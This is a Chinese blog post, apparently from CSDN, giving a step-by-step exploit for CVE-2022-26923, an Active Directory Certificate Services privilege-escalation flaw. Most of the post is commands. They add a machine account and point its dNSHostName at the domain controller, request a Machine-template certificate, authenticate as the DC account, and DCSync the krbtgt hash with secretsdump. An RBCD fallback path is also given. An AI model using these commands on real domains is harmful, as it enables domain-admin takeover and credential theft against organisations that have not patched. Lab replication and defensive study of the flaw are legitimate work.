ADCS攻击之CVE-2022–26923

已于 2023-03-07 23:53:23 修改
阅读量554 收藏
点赞数 1
分类专栏: 内网渗透 文章标签: ADCS攻击 CVE-2022–26923 域渗透 ADCS 内网渗透 Powered by 金山文档
于 2023-03-06 00:13:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adminxe/article/details/129353487
版权

CSDN自动博客文章迁移

漏洞简介

该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。

漏洞利用

添加机器账户,并将该机器账户dnsHostName指向DC[MAQ默认为10]:

certipy account create -u zhang@attack.cn -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win@123456 -dns 'dc.attack.cn'

用该机器账户向ADCS请求证书:

# TARGET为ADCS机器IP

certipy req -u 'hacker$'@attack.cn -p win@123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine

用申请的证书请求DC$的TGT:

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

用DC$的nthash去DCSync:

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

使用bloodyAD 攻击

# 查询MAQ的属性

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

# 新增计算机账号

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123

# 设置新增的机器账号的属性DNSHostName指向AD的属性值

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute 'CN=cremem,CN=Computers,DC=attack,DC=cn' dNSHostName '["dc.attack.cn"]'

# 查看dNSHostName属性的指向

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' dNSHostName

# 运行Certipy生成机器证书,可以看到DNSHostName 已经变成了dc.attack.cn

certipy req 'attack.cn/cremem$:pass123@dc.attack.cn' -ca ATTACK-ADCS-CA -template Machine

# 用申请的证书请求DC$的TGT

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

# 用DC$的nthash去DCSync

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

如果使用certipy请求TGT失败,还可以设置RBCD来攻击:

openssl pkcs12 -in dc.pfx -out dc.pem -nodes

python3 bloodyAD.py -c ':dc.pem' -u 'win$' --host 192.168.11.11 setRbcd 'hacker$' 'dc$'

getST.py attack.cn/'hacker$':'win@123456' -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11

export KRB5CCNAME=administrator.ccache

secretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt

转载请注明:Adminxe's Blog » ADCS攻击之CVE-2022–26923

Adminxe
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透(八十五)之ADCS证书服务攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-28 1107
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
红队|域渗透重要漏洞总结
渗透测试研究中心
11-24 1300
1.MS14-068kerberos认证,no PAC用户在向 Kerberos 密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的 Kerberos 票据漏洞效果:将任意域用户提升到域管权限利用条件:1.小于2012R2的域控 没有打MS14-068的补丁(KB3011780)2.拿下一台加入域的计算机3.有这台域内计算机的域用户密码和Sid利用方式:在《Ker...
渗透测试 | 详解ADCS证书服务攻击手法
MachineGunJoe666
06-13 589
该漏洞产生的主要原因是ADCS服务器在处理计算机模板证书时是通过机器的dNSHostName属性来辨别用户的,而普通域用户即有权限修改它所创建的机器账户dNSHostName属性,因此恶意攻击者可以创建一个机器账户,然后修改它的dNSHostName属性为域控的dNSHostName,然后去请求计算机模板的证书。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。在这种层次结构下,根CA给子从属CA颁发的证书认证,子从属CA给下面的应用颁发和管理证书,根CA不直接给应用颁发证书。
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存马
bring_coco的博客
06-26 1577
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存马写了进去。接下来执行内存马,可以直接访问接口并输入命令,如下。
随着网络犯罪分子逃避云安全防御,无文件攻击激增
热门推荐
网络研究观
07-03 1万+
威胁行为者正在大量投入资源来隐藏活动并避免被发现,以便在受感染的系统中建立更牢固的立足点。
记录一次vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
sszsNo1的博客
06-29 198
vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
春秋云镜 CVE-2022-25578
qq_22002773的博客
06-30 224
春秋云镜 CVE-2022-25578
stm32.ADCS-TM32-shenzhou3-lib3.5.rar_adcstm
09-19
在标题“stm32.ADCS-TM32-shenzhou3-lib3.5.rar_adcstm”和描述“stm32.ADC-stm32神舟3号库函数3.5 adc数模转换”中提到的“STM32神舟3号库函数3.5”,很可能是针对STM32的ADC功能开发的一套软件库,版本为3.5,特别...
精品资料(2021-2022年收藏)硬件课设报告数据采集显示系统nuaa专用.doc
10-11
代码清单中,可以看到一些关键的寄存器地址定义,如ADCS, DACS 和 PA8255,以及用于数据存储的变量如IN0, IN1, NUM1, NUM2等。程序的运行开始于显示主菜单,等待用户输入,根据输入执行数据采集或退出操作。 总体来...
Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf
08-13
"Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf" 本文档主要介绍了如何使用JESD204B高速串行接口同步多个ADC器件的方法。该方法可以应用于许多通信、仪器仪表和信号采集系统中,满足低电压数字信号(LVDS)和...
ADCS EID Reader-crx插件
04-02
语言:English (United States) 通过与控制台应用程序进行通信来在Google Chrome浏览器中读取阿联酋航空ID 开发此扩展程序是为了与控制台应用程序进行通信。 ... 因此,在Web应用程序中几乎是不可能的。...
域渗透笔记-ADCS 域提权-ESC1
NoooEmotion的博客
02-02 1570
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击
CVE-2022-23222 漏洞复现
qq_43472789的博客
06-09 644
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证,攻击者可以利用这个漏洞获取 root 权限。该漏洞是由于 Linux 内核的 eBPF 验证器存在一个空指针漏洞,没有对*_OR_NULL指针类型进行限制,允许这些类型进行指针运算。
cve-2022-26923漏洞复现+实战+踩坑记录
恒安嘉新66的博客
06-11 2706
一、描述cve-2022-26923域内权限提升漏洞,5月份以前的存在证书服务器的通杀域控管理员权限,危害巨大。 #域控漏洞 #域控证书漏洞
春秋云镜 CVE-2022-25411
最新发布
qq_22002773的博客
07-04 470
春秋云镜 CVE-2022-25578
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
m0_46699477的博客
04-01 5584
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。
Goby漏洞更新 | Atlassian Confluence 硬编码用户登陆漏洞 (CVE-2022-26138)
m0_46699477的博客
04-01 378
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 存在安全漏洞,该漏洞源于使用硬编码密码,攻击者可登录查看团队空间成员等敏感信息。
Goby漏洞更新|WordPress Metform 插件 forms 文件信息泄露漏洞(CVE-2022-1442)
m0_46699477的博客
04-12 283
WordPress plugin Metform 是WordPress的一款安全联系表单插件。WordPress plugin Metform存在安全漏洞,该漏洞源于~/core/forms/action.php文件存在访问控制不当,攻击者可获取用户的各种秘钥信息。
Windows域提权漏洞CVE-2022-26923分析与复现
C20220511的博客
06-24 3264
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。这一漏洞最早由安全研究员Oliver Lyak发现并公开分析过程和POC,微软在2022年5月的安全更新中对其进行了修补。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值